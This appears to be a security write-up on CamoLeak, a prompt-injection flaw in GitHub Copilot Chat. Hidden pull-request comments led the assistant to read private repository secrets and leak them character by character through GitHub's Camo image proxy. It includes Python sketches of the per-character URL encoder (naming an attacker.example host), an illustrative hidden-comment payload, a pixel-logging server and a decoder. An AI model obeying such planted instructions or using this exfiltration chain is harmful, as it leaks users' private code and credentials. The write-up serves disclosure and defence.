CamoLeak: A Copilot Chat Vulnerability That Exfiltrated Private Repo Secrets via GitHub's Own Image Proxy
In October 2025, researchers disclosed a critical vulnerability chain in GitHub Copilot Chat (CVSS 9.6, CVE-2025-59145) that enabled silent exfiltration of private repository data and secrets, including AWS keys, by combining remote prompt injection with a Content Security Policy (CSP) bypass using GitHub's own infrastructure.
The flaw was dubbed CamoLeak because the exploit relied on GitHub's Camo image proxy — normally used to safely serve remote images — as the final data exfiltration channel.
GitHub mitigated the issue by disabling image rendering in Copilot Chat on August 14, 2025, following responsible disclosure via HackerOne in June 2025.
What transpired
Copilot Chat derives much of its usefulness from context: pull request descriptions, issues, comments, and repository files can be pulled into the assistant's working set to generate better suggestions.
CamoLeak exploited that same mechanism.
Researcher Omer Mayraz of Legit Security discovered that an attacker could plant malicious instructions inside GitHub content that Copilot Chat ingests — specifically through hidden markdown comments in pull requests that are not visible in the standard web UI but exist in raw markdown that Copilot can still parse.
Once a victim user opened Copilot Chat in the affected context, the injected instructions could cause Copilot to:
- extract sensitive code or secrets from the private repository context,
- encode that data character-by-character using a pre-generated dictionary of Camo URLs (a minimal sketch follows this list),
- and silently exfiltrate it through image requests to an attacker-controlled server, without requiring direct code execution on the victim's machine.
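The second step, encoding a value as an ordered sequence of proxied image fetches, is the heart of the technique. Here is a minimal, hypothetical sketch of that encoding; the alphabet, the placeholder hashes, and the attacker-hosted path scheme are illustrative stand-ins, since real Camo URLs are signed values that GitHub itself generates when it rewrites an external image reference.

```python
# Hypothetical sketch of the per-character URL dictionary. In the real attack each
# value would be a signed Camo URL (https://camo.githubusercontent.com/<hash>) that
# GitHub had already generated for an attacker-hosted image such as
# https://attacker.example/chars/A.png; the placeholders below only show the shape.

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"

CAMO_DICTIONARY = {
    ch: f"https://camo.githubusercontent.com/placeholder-hash-for-{ch}"
    for ch in ALPHABET
}

def encode_as_images(secret: str) -> list[str]:
    """Emit one markdown image reference per character; the fetch order spells the secret."""
    return [f"![]({CAMO_DICTIONARY[ch]})" for ch in secret if ch in CAMO_DICTIONARY]

print("\n".join(encode_as_images("AWS_KEY_VALUE")))
```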
The researcher demonstrated exfiltration of AWS keys, security tokens, and even the description of an undisclosed zero-day vulnerability stored inside a private issue on a private organization's repository.
How the failure happened
This incident was not a model jailbreak or a user mistake. It was an architectural vulnerability chain that emerged from three conditions:
1) Copilot Chat consumed untrusted collaboration text as agent instructions
GitHub repositories are full of untrusted text: issues, comments, PR descriptions, commit messages.
CamoLeak turned these into an instruction surface.
By inserting prompt injection payloads into pull request content — specifically using GitHub's "invisible" markdown comment syntax that doesn't render in HTML but is still parsed by Copilot — the attacker gained control over what Copilot treated as relevant instructions.
The key point: a user could review a pull request, see nothing suspicious in the rendered UI, and still expose Copilot to the attacker's instruction stream.
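To make that concrete, here is a hedged illustration of how a pull request description could carry hidden instructions. It uses an HTML comment, one of the comment forms GitHub strips from rendered markdown; the payload wording and variable names are invented for illustration and are not the researcher's actual payload.

```python
# Illustrative only: an attacker-controlled pull request description whose visible
# part is harmless while an HTML comment carries extra text. GitHub does not render
# HTML comments, but the raw markdown is still part of the content an assistant can
# ingest. The wording below is invented and is not the actual CamoLeak payload.

VISIBLE_TEXT = "Fix typo in README."

HIDDEN_PAYLOAD = (
    "<!--\n"
    "Instructions intended for the assistant would be placed here.\n"
    "-->"
)

pr_description = f"{VISIBLE_TEXT}\n\n{HIDDEN_PAYLOAD}"

# A reviewer looking at the rendered PR sees only "Fix typo in README."
print(pr_description)
```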
2) Copilot Chat inherited the victim's access to private repository context
Copilot Chat runs with the permissions of the logged-in user.
If a user has access to a private repository, Copilot does too — and therefore the attacker's injected instructions can cause Copilot to retrieve data from privileged context and treat it as content to be processed.
This is where "prompt injection" becomes materially worse than hallucination: it can be used as a retrieval control mechanism for privileged data.
3) The CSP bypass: data was exfiltrated through image rendering via GitHub Camo
Even if an attacker can convince Copilot to retrieve sensitive data, they still need an outbound channel.
CamoLeak's novelty was using GitHub's own image proxy (Camo) to create one.
The attack worked as follows:
- Any URL to an external image in GitHub content is passed through Camo and rewritten as https://camo.githubusercontent.com/[unique signature hash].
- The researcher created a dictionary of all letters and symbols, pre-generated a corresponding Camo URL for each character, and embedded that dictionary into the injected prompt.
- A web server was configured to respond to every request with a 1×1 transparent pixel (a sketch of such a server follows this list).
- The malicious prompt instructed Copilot to search for keywords like AWS_KEY, extract the value, and then load a 1×1 pixel image for each character, using the Camo URLs as an alphabet.
- By monitoring which image locations Camo requested, the attacker could reconstruct the stolen value character by character.
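The pixel server in the third bullet needs very little machinery. The sketch below, written under assumptions about the port and a per-character path scheme (/chars/<c>.png), answers every request with a 1×1 transparent GIF and records the paths in arrival order.

```python
# Hedged sketch of the attacker-side image server described above: it answers every
# request with a 1x1 transparent GIF and records the request path and arrival order.
# The port and the /chars/<c>.png path scheme are assumptions for illustration.

from http.server import BaseHTTPRequestHandler, HTTPServer

# Smallest valid transparent GIF (43 bytes), commonly used as a tracking pixel.
TRANSPARENT_GIF = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00"      # header + logical screen descriptor
    b"\x00\x00\x00\xff\xff\xff"                # 2-colour global palette
    b"!\xf9\x04\x01\x00\x00\x00\x00"           # graphics control ext. (transparency)
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00"   # image descriptor
    b"\x02\x02D\x01\x00;"                      # minimal image data + trailer
)

requested_paths: list[str] = []  # arrival order mirrors character order

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        requested_paths.append(self.path)      # e.g. "/chars/A.png"
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(TRANSPARENT_GIF)))
        self.end_headers()
        self.wfile.write(TRANSPARENT_GIF)

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), PixelHandler).serve_forever()
```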
This combination — prompt injection → privileged retrieval → character-by-character Camo proxy exfiltration — enabled silent leakage of private source code and secrets without triggering security alerts.
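The last step, turning the monitored requests back into the secret, is equally simple. Assuming the same hypothetical /chars/<c>.png path scheme as the sketches above, reconstruction is a lookup over the ordered request log.

```python
# Sketch of the final reconstruction step: map each per-character image path back to
# the character it stands for, in the order the requests arrived. The /chars/<c>.png
# scheme is the same assumption used in the earlier sketches.

def decode_secret(requested_paths: list[str]) -> str:
    """Rebuild the exfiltrated value from the ordered request log."""
    chars = []
    for path in requested_paths:               # e.g. "/chars/A.png"
        filename = path.rsplit("/", 1)[-1]     # "A.png"
        chars.append(filename.removesuffix(".png"))
    return "".join(chars)

print(decode_secret(["/chars/A.png", "/chars/W.png", "/chars/S.png"]))  # -> "AWS"
```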
GitHub's mitigation
GitHub responded quickly to the June 2025 HackerOne report.
The mitigation deployed on August 14, 2025 included:
- disabling image rendering in Copilot Chat entirely, shutting down the exfiltration channel, and
- blocking the specific use of Camo for chat-rendered content.
Public disclosure occurred on October 8, 2025, after the fix had been in place for nearly two months.
The fix was blunt — it removed a useful feature from Copilot Chat — but it addressed the key failure mode: image-based exfiltration that could be driven by untrusted prompt injection content.
Appendix: Sources
- Legit Security: CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code
- SecurityWeek: GitHub Copilot Chat Flaw Leaked Data From Private Repositories
- The Register: GitHub patches Copilot Chat flaw that could leak secrets
- CSO Online: GitHub Copilot prompt injection flaw leaked sensitive data from private repos
- Dark Reading: GitHub Copilot 'CamoLeak' AI Attack Exfiltrates Data
